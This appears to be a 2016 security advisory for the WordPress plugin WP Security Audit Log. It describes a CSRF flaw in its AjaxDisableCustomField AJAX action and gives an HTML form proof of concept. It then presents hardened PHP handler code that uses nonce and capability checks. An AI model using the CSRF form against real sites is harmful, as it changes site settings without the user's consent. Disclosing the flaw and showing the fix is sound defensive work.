WP Security Audit Log [CSRF → Plugin Options Update]
Description
An attacker can use the AJAX action AjaxDisableCustomField to update a specific plugin option. The action is privileged, so it takes a registered user to exploit it.
The action is also vulnerable to CSRF attacks.
PoC
<form action="http://sbwp3.dev/wp-admin/admin-ajax.php" method="post">
<input name="action" type="hidden" value="AjaxDisableCustomField" />
<input name="notice" type="hidden" value="my_custom_field-1,my_custom_field-2" />
<input type="submit" value="Click Me!" />
</form>
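Mitigation for this class of bug is a nonce check plus a capability check inside the AJAX handler. The PHP below is an added example, not the plugin's own code: the function names, the option name `example_disabled_custom_fields` and the nonce action are hypothetical placeholders; only the action name and the `notice` parameter come from the PoC above.

```php
<?php
// Added example: hypothetical hardened handler, NOT the plugin's actual code.
// The option name and nonce action below are placeholders.
const EXAMPLE_NONCE_ACTION = 'example_disable_custom_field';
const EXAMPLE_OPTION       = 'example_disabled_custom_fields';

// wp_ajax_{action} fires for ANY logged-in user, so the handler itself must
// verify request origin (nonce) and authorization (capability).
add_action('wp_ajax_AjaxDisableCustomField', 'example_disable_custom_field');

function example_disable_custom_field() {
    // CSRF defence: a cross-site form cannot know the per-user nonce.
    // With $die = false, check_ajax_referer() returns false on failure.
    if (!check_ajax_referer(EXAMPLE_NONCE_ACTION, '_wpnonce', false)) {
        wp_send_json_error('Invalid or missing nonce'); // sends JSON and exits
    }

    // Authorization: only users who may manage options can change them.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Insufficient permissions');
    }

    // 'notice' carries the comma-separated field list seen in the PoC.
    $raw = isset($_POST['notice']) ? wp_unslash($_POST['notice']) : '';
    if (!is_string($raw) || $raw === '') {
        wp_send_json_error('Missing field list');
    }
    $fields = array_filter(array_map('sanitize_text_field', explode(',', $raw)));

    // Merge with the stored list instead of blindly overwriting it.
    $current = (array) get_option(EXAMPLE_OPTION, array());
    $updated = array_values(array_unique(array_merge($current, $fields)));
    update_option(EXAMPLE_OPTION, $updated);

    wp_send_json_success($updated);
}

// The legitimate admin page must embed the nonce so its own requests pass.
function example_render_disable_form() {
    echo '<form action="' . esc_url(admin_url('admin-ajax.php')) . '" method="post">';
    echo '<input name="action" type="hidden" value="AjaxDisableCustomField" />';
    wp_nonce_field(EXAMPLE_NONCE_ACTION, '_wpnonce'); // emits hidden _wpnonce field
    echo '<input name="notice" type="text" />';
    echo '<input type="submit" value="Disable" />';
    echo '</form>';
}
```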
INFO
- 28 June 2016
- Pan Vag
- www.wpwhitesecurity.com
- wordpress.org
- 2.5.9.2
- WordPress 4.5.2
- DWF-2016-87076